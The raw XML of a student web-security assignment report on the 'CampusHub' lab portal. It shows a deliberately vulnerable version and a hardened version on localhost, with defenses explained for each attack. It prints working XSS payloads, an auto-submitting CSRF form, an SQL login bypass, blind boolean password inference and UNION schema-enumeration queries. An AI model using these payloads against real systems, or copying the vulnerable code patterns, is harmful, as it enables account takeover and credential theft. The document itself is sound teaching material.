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ED372" w14:textId="77777777" w:rsidR="007A75DC" w:rsidRDefault="007A75DC" w:rsidP="00DA4882">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>CampusHub Web Security Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1532B4C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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nformation Security Practical Assignment 2 | Part 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554CF8CC"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Muhammad Ibrahim | 23F-0590</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F19C27"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Muhammad Siddique | 23F-0669</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4400492D"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11 October 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A04285A"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CampusHub demonstrates seven web-security requirements in a real database-backed education portal. Its vulnerable and safe versions share the same workflows but use independent SQLite databases. All documented attacks were submitted through the running application and checked in Chromium.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8CD8D6"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The vulnerable version permits reflected, stored and DOM XSS, an authenticated cross-site email update, SQL login bypass, boolean inference and a complete SQL metadata-to-credentials extraction chain. The safe version blocks the same attacks while normal login, search, discussion and email updates continue to work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72678944"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Evidence summary: 41 browser captures and six live HTTP regression test methods passed. Each evidence page records the exact input and observed result, followed by the original browser screenshot. The app footer shows the capture date and time in Pakistan Standard Time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0909FBE7"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GitHub submission URL: https://github.com/ibrahimwarraich101/is-webSecurity. Local Git development commits accompany the project. This report covers Part 2 only; Parts 1 and 3 can be added to the final combined Word submission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F118CAE"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1 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4EDF27"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lastRenderedPageBreak/>
        <w:t>Architecture and Reproduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD3C33E"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Frontend: semantic HTML, responsive CSS and browser JavaScript. Backend: Python standard-library HTTP server. Database: SQLite, accessed through real SQL queries. No application dependencies need to be installed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F606D5"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Start: python app.py. On the configured Windows computer, run ./run.ps1 or invoke the installed Python interpreter shown in README.md. Open http://localhost:8000/vulnerable and http://localhost:8000/safe. The header links switch versions; session cookies and databases are separate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E70BCAC"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Start the attacker in another terminal: python app.py --attacker. It listens at http://127.0.0.1:8001. Main and attacker servers bind only to loopback. All accounts and extracted credentials are synthetic lab records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0602DB2B"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Demo accounts: student / StudentPass!26 and admin / AdminPass!26. The safe database hashes seeded passwords with independent random salts and PBKDF2-HMAC-SHA256. Vulnerable plaintext passwords make the extraction impact visible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369EBB71"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Tables: users(id, username, password, email, role); courses(code, title, credits); comments(id, author, body); enrollments(id, reference, user_id, course_code). The populated seed-data.sql creates both databases; safe initialization hashes its passwords before serving requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0289A816"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Re-run live HTTP tests: python tests/test_security.py. Browser evidence: install the development-only Playwright package, then node tests/browser_evidence.cjs. tests/build_report.py builds the report from the original PNG images. tests/export_word.ps1 converts its temporary RTF to native DOCX through Microsoft Word. The submitted DOCX is editable and can be merged into the final combined report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7601F2C9"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Reset: stop the main server, then python app.py --reset. Only generated lab databases are replaced. Source files and screenshots are preserved. Restarting clears in-memory sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CBFBF6"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2 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038DEF5A"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lastRenderedPageBreak/>
        <w:t>Vulnerability Analysis and Defenses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77240125"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Reflected XSS: the vulnerable course-search summary interpolates request text directly into HTML. The browser interprets the injected SVG onload handler. Safe mode uses HTML output encoding; Content Security Policy is an additional layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4CE426"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Stored XSS: discussion input is stored in SQLite with a parameterized INSERT, but the vulnerable output emits its body as raw HTML. A separate guest visitor loads that saved input and executes it. Safe mode encodes the body at output, preserving the original text without executing it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD95B7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DOM XSS: the planner reads location.hash and assigns decoded input to innerHTML. The fragment never appears in an HTTP request, but its image error handler executes in the browser. Safe mode assigns the value to textContent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209615DC"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CSRF: the vulnerable email update trusts the session cookie without verifying a token or Origin. The external page submits an automatic POST without consent. Safe mode uses a random session-bound token, constant-time comparison, exact Origin validation and explicit SameSite=Lax cookies. The two screenshots after each attack verify the database-backed profile state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D14C8C"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Easy SQL injection: raw username and password are concatenated into the vulnerable login query. A quote closes the username literal; a SQL comment removes the password condition. Safe mode binds the username parameter and separately verifies the password hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50727678"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Intermediate SQL injection: the enrollment lookup exposes only found or not found. Appending true and false predicates confirms injection; testing the first characte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>r of the admin password reveals A without printing the password. Safe mode binds the reference as data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5237AABE"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Advanced SQL injection: ORDER BY 3 succeeds and ORDER BY 4 fails, establishing three result columns. UNION queries enumerate the database, tables and users columns before extracting demo credentials. SQLite schema introspection through pragma_database_list, sqlite_master and pragma_table_info is the equivalent of information_schema. Safe mode parameterizes the LIKE value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9E0A00"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3 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F266B6"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lastRenderedPageBreak/>
        <w:t>CSRF Conditions and Viva Guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5B1D4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The attacker is http://localhost:8001 and the target is http://localhost:8000. These are different origins on the same site. The attacker page submits a forged email update using the existing browser session, without a token. This genuine CSRF demonstration does not depend on the age of the session cookie. Visit /vulnerable for automatic submission, or /vulnerable?manual=1 to inspect the form before pressing Continue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357DDE84"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SameSite=Lax does not stop a same-site, cross-origin request. The safe demonstration therefore sends the real authenticated session cookie and receives HTTP 403 from server-side token and Origin validation. The unchanged profile is checked after the attack. The additional cross-site URL http://127.0.0.1:8001 remains available, but its vulnerable success can depend on browser cookie policy; use localhost:8001 for the viva.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CE459F"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For the viva, first browse the dashboard and demonstrate normal login, course search, posting and email changes. For each XSS type, submit the payload through its actual UI, explain its source and sink, then repeat on safe mode. For stored XSS use a different unauthenticated browser context to establish persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C51AC2B"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For SQL injection, explain how quotes, comments and UNION alter the query structure. Demonstrate true/false inference, then follow the adva</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nced chain in order. The final cards contain actual synthetic records queried from SQLite, rather than a scripted success message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4446CB6E"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For CSRF, sign in immediately before visiting the external page. Show the before and after profile emails in both versions, and explain why a cookie alone cannot establish user intent. Different ports alone change origins, not sites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF724AF"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The safe version addresses the assignment attack set. Production use would additionally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> require HTTPS and Secure cookies, session expiry, rate limiting, access-control policy and operational monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264732BB"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References: OWASP Cross Site Scripting Prevention Cheat Sheet; OWASP Cross Site Request Forgery Prevention Cheat Sheet; OWASP SQL Injection Prevention Cheat Sheet. Direct links are included in README.md.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1471EBCE"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4 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716FF654"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lastRenderedPageBreak/>
        <w:t>CSRF Attack Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F49F311"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Run python app.py --attacker,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sign in as student at http://localhost:8000/vulnerable/login, then visit http://localhost:8001/vulnerable. The external document contains this complete attack payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FECB71"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&lt;!doctype html&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;html&gt;&lt;body&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;form id="attack" method="post" action="http://localhost:8000/vulnerable/profile"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;input type="hidden" name="email" value="attacker@lab.invalid"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;button&gt;Continue&lt;/button&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;script&gt;document.getElementById("attack").submit()&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;/body&gt;&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CF4FB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Repeat with safe in the target action and attacker URL after signing in to the safe version. The request has no csrf_token and an external Origin, so it receives HTTP 403. No email update is committed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4331287F"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The setup screenshots use ?manual=1, which omits only the automatic submission script so the attacker form can be inspected. Pressing Continue sends the same forged POST. The automatic route is separately covered by the browser test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEB6FE3"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5 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16302744"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lastRenderedPageBreak/>
        <w:t>Vulnerable Version Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505F2056"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Application dashboard renders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C686BC4"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2026-10-11T16:07:56.327Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB26F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http://localhost:8000/vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A123615"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08FC99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344.25pt">
            <v:imagedata r:id="rId4" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B19C92"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6 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D057D2"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lastRenderedPageBreak/>
        <w:t>Vulnerable Version XSS Reflected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC5D167"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&lt;svg onload="document.getElementById(`search-summary`).textContent=`REFLECTED XSS EXECUTED`"&gt;&lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FF4C82"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Payload executed through the search response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A270D3D"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2026-10-11T16:07:57.263Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7733BA4B"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endpoint: http://localhost:8000/vulnerable/courses. Exact encoded URL is in verification.json.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167EC6FC"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5D9311F1">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A46F37"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7 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774B5743"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lastRenderedPageBreak/>
        <w:t>Vulnerable Version XSS DOM Based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205F8DB8"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&lt;img src=x onerror="document.getElementById('note-preview').textContent='DOM XSS EXECUTED'"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCC805F"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Fragment payload executed in innerHTML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C657CA7"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2026-10-11T16:07:58.088Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6BD8B9"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endpoint: http://localhost:8000/vulnerable/planner. Exact encoded URL is in verification.json.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50662B0A"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6E243000">
          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId6" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8E05F5"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8 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3587745A"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lastRenderedPageBreak/>
        <w:t>Vulnerable Version XSS Stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28876D59"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&lt;svg onload="this.parentElement.innerHTML='&lt;strong&gt;STORED XSS EXECUTED&lt;/strong&gt;'"&gt;&lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7AC23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Saved payload executes for a separate unauthenticated visitor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76791AAE"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2026-10-11T16:07:59.943Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0184AB"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http://localhost:8000/vulnerable/discussion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184B468D"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7D526DF3">
          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:495pt;height:390pt">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADE4C11"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9 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D18EE88"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lastRenderedPageBreak/>
        <w:t>Vulnerable Version Csrf Before</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2083C6C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Normal authenticated profile update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6C8A7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Original email persisted before the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3107F0F6"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2026-10-11T16:08:00.573Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B3D407"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http://localhost:8000/vulnerable/profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D9CF08"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5E511084">
          <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId8" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE8527A"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10 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB0F3BB"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lastRenderedPageBreak/>
        <w:t>Vulnerable Version Csrf Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05830582"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External HTML form posts email=attacker@lab.invalid to localhost:8000 without a CSRF token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E770507"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Attacker form is hosted on a separate origin, localhost:8001.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070884E2"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2026-10-11T16:08:01.001Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDE937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http://localhost:8001/vulnerable?manual=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CB1883"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66F380ED">
          <v:shape id="_x0000_i1030" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId9" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="577837EC"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11 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A064CE0"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lastRenderedPageBreak/>
        <w:t>Vulnerable Version Csrf Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBFF5AF"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External POST: email=attacker@lab.invalid; no CSRF token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4540F8EA"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Cross-origin form changed the authenticated profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689A07A4"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2026-10-11T16:08:01.470Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78240839"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http://localhost:8000/vulnerable/profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195C7742"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26A5F04C">
          <v:shape id="_x0000_i1031" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId10" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B57DEE5"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12 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450EA858"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lastRenderedPageBreak/>
        <w:t>Vulnerable Version Csrf After</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5D17CD"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External POST followed by authenticated profile verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3466F987"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Attacker email is stored in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7F72A7"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2026-10-11T16:08:01.919Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5E5CDD"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http://localhost:8000/vulnerable/profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381D6F37"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4700522D">
          <v:shape id="_x0000_i1032" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId11" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C405E28"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13 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6901D2"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Vulnerable Version SQL Injection Easy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53778E3C"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username=admin' -- ; password=wrong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C986F7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Authentication bypassed as administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF7D4C8"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2026-10-11T16:08:02.623Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AAE63B"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http://localhost:8000/vulnerable/profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4F3CBA"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725D5585">
          <v:shape id="_x0000_i1033" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId12" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D97680"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14 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A3D88E"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Vulnerable Version Sql Injection Intermediate True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B7811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ENR-2026-001' AND 1=1 -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF864E"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Enrollment found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02300DFF"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2026-10-11T16:08:03.188Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089590D5"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http://localhost:8000/vulnerable/enrollment?reference=ENR-2026-001%27+AND+1%3D1+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE200C3"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01A6D2F8">
          <v:shape id="_x0000_i1034" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId13" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35443151"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15 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1424BE21"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Vulnerable Version Sql Injection Intermediate False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609EB95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ENR-2026-001' AND 1=2 -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44388DFA"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No matching enrollment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AB8E14"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2026-10-11T16:08:03.759Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7876826F"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http://localhost:8000/vulnerable/enrollment?reference=ENR-2026-001%27+AND+1%3D2+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7576CF1D"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77F82D1C">
          <v:shape id="_x0000_i1035" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId14" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F46FDD"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16 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61745384"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Vulnerable Version Sql Injection Intermediate Infer A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B4CDD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ENR-2026-001' AND substr((SELECT password FROM users WHERE username='admin'),1,1)='A' -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21487CC1"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Enrollment found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E6C9EF"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2026-10-11T16:08:04.364Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DDBD26"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endpoint: http://localhost:8000/vulnerable/enrollment. Exact encoded URL is in verification.json.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AE473A"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06E79425">
          <v:shape id="_x0000_i1036" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId15" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEF4F8B"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17 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CB484F"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Vulnerable Version Sql Injection Intermediate Infer Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A1DD1D"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ENR-2026-001' AND substr((SELECT password FROM users WHERE username='admin'),1,1)='Z' -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AC4FEB"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No matching enrollment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2282AE8F"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2026-10-11T16:08:04.984Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6F6E22"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endpoint: http://localhost:8000/vulnerable/enrollment. Exact encoded URL is in verification.json.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE0BB15"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7D2B0FF4">
          <v:shape id="_x0000_i1037" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId16" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B75FF54"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18 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D1062C"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Vulnerable Version Sql Injection Advanced Columns Three</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E6727E"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 ORDER BY 3 -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C32192"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Observed database response: Information Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEB90B1"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2026-10-11T16:08:05.579Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141AA80D"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http://localhost:8000/vulnerable/courses?q=%27+ORDER+BY+3+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DADB4B7"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780FEC8A">
          <v:shape id="_x0000_i1038" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId17" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFAC0F2"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19 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC8F668"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Vulnerable Version Sql Injection Advanced Columns Four</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A1BC3C"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 ORDER BY 4 -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BF3C6F"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Observed database response: ORDER BY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177E6B3C"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2026-10-11T16:08:06.193Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E48867"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http://localhost:8000/vulnerable/courses?q=%27+ORDER+BY+4+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4551CCAE"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15F24F5D">
          <v:shape id="_x0000_i1039" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId18" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E261350"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20 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BFD7AD"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Vulnerable Version Sql Injection Advanced Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC1EC2D"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 UNION SELECT 'DATABASE',name,file FROM pragma_database_list -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098E5C82"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Observed database response: main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357F98E8"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2026-10-11T16:08:06.836Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B19C02A"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http://localhost:8000/vulnerable/courses?q=%27+UNION+SELECT+%27DATABASE%27%2Cname%2Cfile+FROM+pragma_database_list+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EDFAD4"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0BDB658D">
          <v:shape id="_x0000_i1040" type="#_x0000_t75" style="width:495pt;height:361.5pt">
            <v:imagedata r:id="rId19" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BC5C53"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21 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162EB6AB"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Vulnerable Version Sql Injection Advanced Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192281C9"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 UNION SELECT 'TABLE',name,sql FROM sqlite_master WHERE type='table' -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD9B051"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Observed database response: CREATE TABLE users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494E0B6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2026-10-11T16:08:07.491Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5217A76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http://localhost:8000/vulnerable/courses?q=%27+UNION+SELECT+%27TABLE%27%2Cname%2Csql+FROM+sqlite_master+WHERE+type%3D%27table%27+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707D534F"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7AD37FA0">
          <v:shape id="_x0000_i1041" type="#_x0000_t75" style="width:427.5pt;height:395.25pt">
            <v:imagedata r:id="rId20" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F1EF72"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22 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667B91B3"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Vulnerable Version Sql Injection Advanced Columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D915D17"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 UNION SELECT 'COLUMN',name,type FROM pragma_table_info('users') -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAD05C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Observed database response: password</w:t>
      </w:r>
    </w:p>
